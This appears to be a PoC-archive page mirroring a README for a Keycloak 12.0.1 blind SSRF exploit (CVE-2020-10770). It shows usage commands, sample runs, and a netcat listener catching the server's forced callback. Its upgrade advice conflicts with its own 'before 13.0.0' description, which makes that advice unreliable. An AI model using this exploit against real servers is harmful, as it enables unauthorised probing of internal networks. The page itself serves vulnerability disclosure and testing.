Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-10770 PoC — 红帽 Red Hat Keycloak 代码问题漏洞

Source
https://github.com/ColdFusionX/Keycloak-12.0.1-CVE-2020-10770
Associated Vulnerability
Title:红帽 Red Hat Keycloak 代码问题漏洞 (CVE-2020-10770)
Description:A flaw was found in Keycloak before 13.0.0, where it is possible to force the server to call out an unverified URL using the OIDC parameter request_uri. This flaw allows an attacker to use this parameter to execute a Server-side request forgery (SSRF) attack.
Description
Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)
Readme
# Keycloak-12.0.1-CVE-2020-10770

> Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated) 

[Exploit-DB-50405](https://www.exploit-db.com/exploits/50405)

Expected outcome: Port scan of localhost or internally accessible hosts.

Intended only for educational and testing in corporate environments.

This Exploit was tested on Python 3.8.6

Vulnerable application : 

```shell
docker run -p 9990:9990 -p 8080:8080 -e KEYCLOAK_USER=admin -e KEYCLOAK_PASSWORD=admin jboss/keycloak:12.0.1
```
### Usage:

```shell
cfx:  ~/keycloak
→ python3 exploit.py -h
usage: exploit.py [-h] [-u URL]

-=[Keycloak Blind SSRF test by ColdFusionX]=-

optional arguments:
  -h, --help         show this help message and exit
  -u URL, --url URL  Keycloak Target URL (Example: http://127.0.0.1:8080)

Exploit Usage :
./exploit.py -u http://127.0.0.1:8080
[^] Input Netcat host:port -> 192.168.0.1:4444
```

### POC: 

- Scenario 1: Non Vulnerable Target

```shell
cfx:  ~/keycloak
→ python3 exploit.py -u http://localhost:8080

[+] Keycloak Bind SSRF test by ColdFusionX

[^] Input Netcat host:port -> 192.168.0.1:4444

[-] Invalid URL or Target not Vulnerable
```

- Scenario 2: Vulnerable Target

```shell
cfx:  ~/keycloak
→ python3 exploit.py -u http://localhost:8080

[+] Keycloak Bind SSRF test by ColdFusionX

[^] Input Netcat host:port -> 192.168.0.1:9994

[+] BINGO! Check Netcat listener for HTTP callback :)

```

HTTP Callback on nc listener:

```
cfx:  ~/keycloak
→ nc -lvnp 9994
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9994
Ncat: Listening on 0.0.0.0:9994
Ncat: Connection from 172.17.0.2.
Ncat: Connection from 172.17.0.2:36866.
GET / HTTP/1.1
Host: 192.168.0.1:9994
Connection: Keep-Alive
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.9.1)
Accept-Encoding: gzip,deflate
```

### Solution

Upgrade to Keycloak 12.0.2 or later version

### Reference

- https://bugzilla.redhat.com/show_bug.cgi?id=1846270
- https://nvd.nist.gov/vuln/detail/CVE-2020-10770
File Snapshot

 [4.0K]  /data/pocs/6ed813ba1cdfc33bf855985e721823dc69e39af9
├── [1.8K]  exploit.py
├── [1.0K]  LICENSE
└── [2.0K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →